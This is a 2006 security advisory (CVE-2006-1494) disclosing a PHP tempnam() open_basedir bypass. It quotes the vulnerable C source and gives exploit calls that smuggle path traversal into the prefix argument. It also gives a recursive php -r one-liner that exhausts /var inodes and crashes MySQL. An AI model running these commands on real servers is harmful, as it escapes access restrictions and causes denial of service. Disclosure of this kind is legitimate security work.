<<< Date Index >>>     <<< Thread Index >>>

tempnam() open_basedir bypass PHP 4.4.2 and 5.1.2



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[tempnam() open_basedir bypass PHP 4.4.2 and 5.1.2]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
- -Written: 26.3.2006
- -Public: 8.4.2006
from SECURITYREASON.COM
CVE-2006-1494

- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from 
C, Java and Perl with a couple of unique PHP-specific features thrown in. The 
goal of the language is to allow web developers to write dynamically generated 
pages quickly.

A nice introduction to PHP by Stig Sæther Bakken can be found at 
http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of the 
PHP Conference Material is freely available. 
tempnam -- Create file with unique file name

- --- 1. tempnam() open_basedir bypass ---
In function tempname() are required 2 arg`s.

http://pl.php.net/manual/en/function.tempnam.php

string tempnam ( string dir, string prefix )

So, if we have open_basedir set to /home, we can't create file over /home 
directory.
In ext/standard/file.c (PHP 4.4.2)

- -550-578---
PHP_FUNCTION(tempnam)
{
        pval **arg1, **arg2;
        char *d;
        char *opened_path;
        char p[64];
        FILE *fp;

        if (ZEND_NUM_ARGS() != 2 || zend_get_parameters_ex(2, &arg1, &arg2) == 
FAILURE) {
                WRONG_PARAM_COUNT;
        }
        convert_to_string_ex(arg1);
        convert_to_string_ex(arg2);

        if (php_check_open_basedir(Z_STRVAL_PP(arg1) TSRMLS_CC)) {
                RETURN_FALSE;
        }

        d = estrndup(Z_STRVAL_PP(arg1), Z_STRLEN_PP(arg1));
        strlcpy(p, Z_STRVAL_PP(arg2), sizeof(p));

        if ((fp = php_open_temporary_file(d, p, &opened_path TSRMLS_CC))) {
                fclose(fp);
                RETVAL_STRING(opened_path, 0);
        } else {
                RETVAL_FALSE;
        }
        efree(d);
}
- -550-578---

if (php_check_open_basedir(Z_STRVAL_PP(arg1) TSRMLS_CC)) {
        RETURN_FALSE;
}

Where is arg2?
So we can write exploit like:
tempnam("path_from_open_basedir", 
"../../../../../../../../Open_basedir_bypasswd");

tempnam("/home", "../../../../../../tmp/cx");

etc.

It is low issue but you can try create a lot of files and overload inodes from 
HD.I have one particion.

/var /dev/ad0s1e    1.0G     97M    858M    10%    /var <- Space (B)
/dev/ad0s1e   1012974    94472  837466    10%    3796  137514    3%   /var <- 
INODES

where mysql and apache try create some file. WWhen we overload free inodes, 
system have big problem with apache, mysql.

Example:

cxib# php -r 'function cx(){ tempnam("/www/", "../../../../../../var/tmp/cx"); 
cx(); } cx();'
/var: create/symlink failed, no inodes free

/var: create/symlink failed, no inodes free

/var: create/symlink failed, no inodes free

/var: create/symlink failed, no inodes free
... etc

/usr/local/libexec/mysqld: Can't create/write to file '/var/tmp/ibBIsZ6o' 
(Errcode: 13)
And mysql die()!

- --- 2. How to fix ---
CVS
http://cvs.php.net/viewcvs.cgi/php-src/NEWS

- --- 3. Greets ---

For: sp3x
and
p_e_a, pi3, eax, Infospec ;]

- --- 4. Contact ---
Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
SecurityReason.Com

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (FreeBSD)

iD8DBQFEOAZB3Ke13X/fTO4RAiDmAKCbBZP8JBC0F/9cB5OgUFJPgqHB4QCgon9L
kBEMIExP2TZ0+NP7l5uk9TE=
=f3i4
-----END PGP SIGNATURE-----